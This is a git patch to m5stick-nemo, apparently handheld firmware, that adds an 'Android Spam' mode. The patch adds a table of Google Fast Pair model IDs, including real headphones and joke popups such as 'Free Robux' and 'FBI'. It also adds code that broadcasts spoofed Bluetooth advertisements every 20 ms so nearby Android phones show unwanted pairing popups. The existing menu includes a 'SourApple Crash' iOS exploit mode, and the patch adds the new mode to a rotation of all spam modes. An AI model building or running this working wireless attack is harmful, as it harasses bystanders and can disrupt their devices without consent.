From 9f382150630b64cd296ac4246921e6d0d0768a9b Mon Sep 17 00:00:00 2001 From: Noah Axon Date: Thu, 28 Dec 2023 12:59:41 -0600 Subject: [PATCH] Add Bluetooth Android Spam --- applejuice.h | 209 +++++++++++++++++++++++++++++++++++++++++++++++ m5stick-nemo.ino | 57 +++++++++++-- 2 files changed, 260 insertions(+), 6 deletions(-) diff --git a/applejuice.h b/applejuice.h index 38ade3b..fb0829f 100644 --- a/applejuice.h +++ b/applejuice.h @@ -33,5 +33,214 @@ uint8_t TVColorBalance[23] = {0x16, 0xff, 0x4c, 0x00, 0x04, 0x04, 0x2a, 0x00, 0x uint8_t* data; int deviceType = 0; +struct DeviceType { + uint32_t value; + String name; +}; + +DeviceType android_models[] = { + // Genuine non-production/forgotten (good job Google) + {0x0001F0, "Bisto CSR8670 Dev Board"}, + {0x000047, "Arduino 101"}, + {0x470000, "Arduino 101 2"}, + {0x00000A, "Anti-Spoof Test"}, + {0x0A0000, "Anti-Spoof Test 2"}, + {0x00000B, "Google Gphones"}, + {0x0B0000, "Google Gphones 2"}, + {0x0C0000, "Google Gphones 3"}, + {0x00000D, "Test 00000D"}, + {0x000007, "Android Auto"}, + {0x070000, "Android Auto 2"}, + {0x000008, "Foocorp Foophones"}, + {0x080000, "Foocorp Foophones 2"}, + {0x000009, "Test Android TV"}, + {0x090000, "Test Android TV 2"}, + {0x000035, "Test 000035"}, + {0x350000, "Test 000035 2"}, + {0x000048, "Fast Pair Headphones"}, + {0x480000, "Fast Pair Headphones 2"}, + {0x000049, "Fast Pair Headphones 3"}, + {0x490000, "Fast Pair Headphones 4"}, + {0x001000, "LG HBS1110"}, + {0x00B727, "Smart Controller 1"}, + {0x01E5CE, "BLE-Phone"}, + {0x0200F0, "Goodyear"}, + {0x00F7D4, "Smart Setup"}, + {0xF00002, "Goodyear"}, + {0xF00400, "T10"}, + {0x1E89A7, "ATS2833_EVB"}, + + // Phone setup + {0x00000C, "Google Gphones Transfer"}, + {0x0577B1, "Galaxy S23 Ultra"}, + {0x05A9BC, "Galaxy S20+"}, + + // Genuine devices + {0xCD8256, "Bose NC 700"}, + {0x0000F0, "Bose QuietComfort 35 II"}, + {0xF00000, "Bose QuietComfort 35 II 2"}, + {0x821F66, "JBL Flip 6"}, + {0xF52494, "JBL Buds Pro"}, + {0x718FA4, "JBL Live 300TWS"}, + {0x0002F0, "JBL Everest 110GA"}, + {0x92BBBD, "Pixel Buds"}, + {0x000006, "Google Pixel buds"}, + {0x060000, "Google Pixel buds 2"}, + {0xD446A7, "Sony XM5"}, + {0x2D7A23, "Sony WF-1000XM4"}, + {0x0E30C3, "Razer Hammerhead TWS"}, + {0x72EF8D, "Razer Hammerhead TWS X"}, + {0x72FB00, "Soundcore Spirit Pro GVA"}, + {0x0003F0, "LG HBS-835S"}, + {0x002000, "AIAIAI TMA-2 (H60)"}, + {0x003000, "Libratone Q Adapt On-Ear"}, + {0x003001, "Libratone Q Adapt On-Ear 2"}, + {0x00A168, "boAt Airdopes 621"}, + {0x00AA48, "Jabra Elite 2"}, + {0x00AA91, "Beoplay E8 2.0"}, + {0x00C95C, "Sony WF-1000X"}, + {0x01EEB4, "WH-1000XM4"}, + {0x02AA91, "B&O Earset"}, + {0x01C95C, "Sony WF-1000X"}, + {0x02D815, "ATH-CK1TW"}, + {0x035764, "PLT V8200 Series"}, + {0x038CC7, "JBL TUNE760NC"}, + {0x02DD4F, "JBL TUNE770NC"}, + {0x02E2A9, "TCL MOVEAUDIO S200"}, + {0x035754, "Plantronics PLT_K2"}, + {0x02C95C, "Sony WH-1000XM2"}, + {0x038B91, "DENON AH-C830NCW"}, + {0x02F637, "JBL LIVE FLEX"}, + {0x02D886, "JBL REFLECT MINI NC"}, + {0xF00000, "Bose QuietComfort 35 II"}, + {0xF00001, "Bose QuietComfort 35 II"}, + {0xF00201, "JBL Everest 110GA"}, + {0xF00204, "JBL Everest 310GA"}, + {0xF00209, "JBL LIVE400BT"}, + {0xF00205, "JBL Everest 310GA"}, + {0xF00200, "JBL Everest 110GA"}, + {0xF00208, "JBL Everest 710GA"}, + {0xF00207, "JBL Everest 710GA"}, + {0xF00206, "JBL Everest 310GA"}, + {0xF0020A, "JBL LIVE400BT"}, + {0xF0020B, "JBL LIVE400BT"}, + {0xF0020C, "JBL LIVE400BT"}, + {0xF00203, "JBL Everest 310GA"}, + {0xF00202, "JBL Everest 110GA"}, + {0xF00213, "JBL LIVE650BTNC"}, + {0xF0020F, "JBL LIVE500BT"}, + {0xF0020E, "JBL LIVE500BT"}, + {0xF00214, "JBL LIVE650BTNC"}, + {0xF00212, "JBL LIVE500BT"}, + {0xF0020D, "JBL LIVE400BT"}, + {0xF00211, "JBL LIVE500BT"}, + {0xF00215, "JBL LIVE650BTNC"}, + {0xF00210, "JBL LIVE500BT"}, + {0xF00305, "LG HBS-1500"}, + {0xF00304, "LG HBS-1010"}, + {0xF00308, "LG HBS-1125"}, + {0xF00303, "LG HBS-930"}, + {0xF00306, "LG HBS-1700"}, + {0xF00300, "LG HBS-835S"}, + {0xF00309, "LG HBS-2000"}, + {0xF00302, "LG HBS-830"}, + {0xF00307, "LG HBS-1120"}, + {0xF00301, "LG HBS-835"}, + {0xF00E97, "JBL VIBE BEAM"}, + {0x04ACFC, "JBL WAVE BEAM"}, + {0x04AA91, "Beoplay H4"}, + {0x04AFB8, "JBL TUNE 720BT"}, + {0x05A963, "WONDERBOOM 3"}, + {0x05AA91, "B&O Beoplay E6"}, + {0x05C452, "JBL LIVE220BT"}, + {0x05C95C, "Sony WI-1000X"}, + {0x0602F0, "JBL Everest 310GA"}, + {0x0603F0, "LG HBS-1700"}, + {0x1E8B18, "SRS-XB43"}, + {0x1E955B, "WI-1000XM2"}, + {0x1EC95C, "Sony WF-SP700N"}, + {0x1ED9F9, "JBL WAVE FLEX"}, + {0x1EE890, "ATH-CKS30TW WH"}, + {0x1EEDF5, "Teufel REAL BLUE TWS 3"}, + {0x1F1101, "TAG Heuer Calibre E4 45mm"}, + {0x1F181A, "LinkBuds S"}, + {0x1F2E13, "Jabra Elite 2"}, + {0x1F4589, "Jabra Elite 2"}, + {0x1F4627, "SRS-XG300"}, + {0x1F5865, "boAt Airdopes 441"}, + {0x1FBB50, "WF-C700N"}, + {0x1FC95C, "Sony WF-SP700N"}, + {0x1FE765, "TONE-TF7Q"}, + {0x1FF8FA, "JBL REFLECT MINI NC"}, + {0x201C7C, "SUMMIT"}, + {0x202B3D, "Amazfit PowerBuds"}, + {0x20330C, "SRS-XB33"}, + {0x003B41, "M&D MW65"}, + {0x003D8A, "Cleer FLOW II"}, + {0x005BC3, "Panasonic RP-HD610N"}, + {0x008F7D, "soundcore Glow Mini"}, + {0x00FA72, "Pioneer SE-MS9BN"}, + {0x0100F0, "Bose QuietComfort 35 II"}, + {0x011242, "Nirvana Ion"}, + {0x013D8A, "Cleer EDGE Voice"}, + {0x01AA91, "Beoplay H9 3rd Generation"}, + {0x038F16, "Beats Studio Buds"}, + {0x039F8F, "Michael Kors Darci 5e"}, + {0x03AA91, "B&O Beoplay H8i"}, + {0x03B716, "YY2963"}, + {0x03C95C, "Sony WH-1000XM2"}, + {0x03C99C, "MOTO BUDS 135"}, + {0x03F5D4, "Writing Account Key"}, + {0x045754, "Plantronics PLT_K2"}, + {0x045764, "PLT V8200 Series"}, + {0x04C95C, "Sony WI-1000X"}, + {0x050F0C, "Major III Voice"}, + {0x052CC7, "MINOR III"}, + {0x057802, "TicWatch Pro 5"}, + {0x0582FD, "Pixel Buds"}, + {0x058D08, "WH-1000XM4"}, + {0x06AE20, "Galaxy S21 5G"}, + {0x06C197, "OPPO Enco Air3 Pro"}, + {0x06C95C, "Sony WH-1000XM2"}, + {0x06D8FC, "soundcore Liberty 4 NC"}, + {0x0744B6, "Technics EAH-AZ60M2"}, + {0x07A41C, "WF-C700N"}, + {0x07C95C, "Sony WH-1000XM2"}, + {0x07F426, "Nest Hub Max"}, + {0x0102F0, "JBL Everest 110GA - Gun Metal"}, + {0x0202F0, "JBL Everest 110GA - Silver"}, + {0x0302F0, "JBL Everest 310GA - Brown"}, + {0x0402F0, "JBL Everest 310GA - Gun Metal"}, + {0x0502F0, "JBL Everest 310GA - Silver"}, + {0x0702F0, "JBL Everest 710GA - Gun Metal"}, + {0x0802F0, "JBL Everest 710GA - Silver"}, + {0x054B2D, "JBL TUNE125TWS"}, + {0x0660D7, "JBL LIVE770NC"}, + {0x0103F0, "LG HBS-835"}, + {0x0203F0, "LG HBS-830"}, + {0x0303F0, "LG HBS-930"}, + {0x0403F0, "LG HBS-1010"}, + {0x0503F0, "LG HBS-1500"}, + {0x0703F0, "LG HBS-1120"}, + {0x0803F0, "LG HBS-1125"}, + {0x0903F0, "LG HBS-2000"}, + + // Custom debug popups + {0xD99CA1, "Flipper Zero"}, + {0x77FF67, "Free Robux"}, + {0xAA187F, "Free VBucks"}, + {0xDCE9EA, "Rickroll"}, + {0x87B25F, "Animated Rickroll"}, + {0x1448C9, "BLM"}, + {0x13B39D, "Talking Sasquach"}, + {0x7C6CDB, "Obama"}, + {0x005EF9, "Ryanair"}, + {0xE2106F, "FBI"}, + {0xB37A62, "Tesla"}, + {0x92ADC9, "Ton Upgrade Netflix"}, +}; + +int android_models_count = (sizeof(android_models) / sizeof(android_models[0])); + BLEAdvertisementData oAdvertisementData = BLEAdvertisementData(); BLEAdvertising *pAdvertising; diff --git a/m5stick-nemo.ino b/m5stick-nemo.ino index de2b55e..dfca197 100644 --- a/m5stick-nemo.ino +++ b/m5stick-nemo.ino @@ -2,13 +2,13 @@ // github.com/n0xa | IG: @4x0nn // -=-=-=-=-=-=- Uncomment the platform you're building for -=-=-=-=-=-=- -//#define STICK_C_PLUS +#define STICK_C_PLUS //#define STICK_C_PLUS2 //#define STICK_C -#define CARDPUTER +//#define CARDPUTER // -=-=- Uncommenting more than one at a time will result in errors -=-=- -String buildver="2.0.5"; +String buildver="2.1.0"; #define BGCOLOR BLACK #define FGCOLOR GREEN @@ -118,6 +118,7 @@ int ajDelay = 1000; bool rstOverride = false; // Reset Button Override. Set to true when navigating menus. bool sourApple = false; // Internal flag to place AppleJuice into SourApple iOS17 Exploit Mode bool swiftPair = false; // Internal flag to place AppleJuice into Swift Pair random packet Mode +bool androidPair = false; // Internal flag to place AppleJuice into Android Pair random packet Mode bool maelstrom = false; // Internal flag to place AppleJuice into Bluetooth Maelstrom mode #if defined(USE_EEPROM) #include @@ -796,9 +797,10 @@ void sendAllCodes() { /// Bluetooth Spamming /// /// BTSPAM MENU /// MENU btmenu[] = { - { "Back", 4}, + { "Back", 5}, { "AppleJuice", 0}, { "Swift Pair", 1}, + { "Android Spam", 4}, { "SourApple Crash", 2}, { "BT Maelstrom", 3}, }; @@ -818,6 +820,7 @@ void btmenu_setup() { sourApple = false; swiftPair = false; maelstrom = false; + androidPair = false; rstOverride = true; btmenu_drawmenu(); delay(500); // Prevent switching after menu loads up @@ -871,6 +874,15 @@ void btmenu_loop() { DISP.print("\n\nNext: Exit"); break; case 4: + androidPair = true; + current_proc = 9; // jump straight to appleJuice Advertisement + rstOverride = false; + isSwitching = true; + DISP.print("Android Spam"); + DISP.print("\n\nNext: Exit"); + break; + + case 5: DISP.fillScreen(BGCOLOR); rstOverride = false; isSwitching = true; @@ -1074,7 +1086,7 @@ void aj_adv(){ // Isolating this to its own process lets us take advantage // of the background stuff easier (menu button, dimmer, etc) rstOverride = true; - if (sourApple || swiftPair || maelstrom){ + if (sourApple || swiftPair || androidPair || maelstrom){ delay(20); // 20msec delay instead of ajDelay for SourApple attack advtime = 0; // bypass ajDelay counter } @@ -1136,6 +1148,31 @@ void aj_adv(){ oAdvertisementData.addData(std::string((char *)packet, size)); free(packet); free((void*)display_name); + } else if (androidPair) { + Serial.print("Android Spam Advertisement: "); + uint8_t packet[14]; + uint8_t i = 0; + packet[i++] = 3; // Packet Length + packet[i++] = 0x03; // AD Type (Service UUID List) + packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair) + packet[i++] = 0xFE; // ... + packet[i++] = 6; // Size + packet[i++] = 0x16; // AD Type (Service Data) + packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair) + packet[i++] = 0xFE; // ... + const uint32_t model = android_models[rand() % android_models_count].value; // Action Type + packet[i++] = (model >> 0x10) & 0xFF; + packet[i++] = (model >> 0x08) & 0xFF; + packet[i++] = (model >> 0x00) & 0xFF; + packet[i++] = 2; // Size + packet[i++] = 0x0A; // AD Type (Tx Power Level) + packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm + + oAdvertisementData.addData(std::string((char *)packet, 14)); + for (int i = 0; i < sizeof packet; i ++) { + Serial.printf("%02x", packet[i]); + } + Serial.println(""); } else { Serial.print("AppleJuice Advertisement: "); if (deviceType >= 18){ @@ -1158,7 +1195,7 @@ void aj_adv(){ #endif } if (check_next_press()) { - if (sourApple || swiftPair || maelstrom){ + if (sourApple || swiftPair || androidPair || maelstrom){ isSwitching = true; current_proc = 16; btmenu_drawmenu(); @@ -1304,11 +1341,19 @@ void btmaelstrom_loop(){ aj_adv(); if (maelstrom){ swiftPair = true; + androidPair = false; sourApple = false; aj_adv(); } if (maelstrom){ swiftPair = false; + androidPair = true; + sourApple = false; + aj_adv(); + } + if (maelstrom){ + swiftPair = false; + androidPair = false; sourApple = false; aj_loop(); // roll a random device ID aj_adv();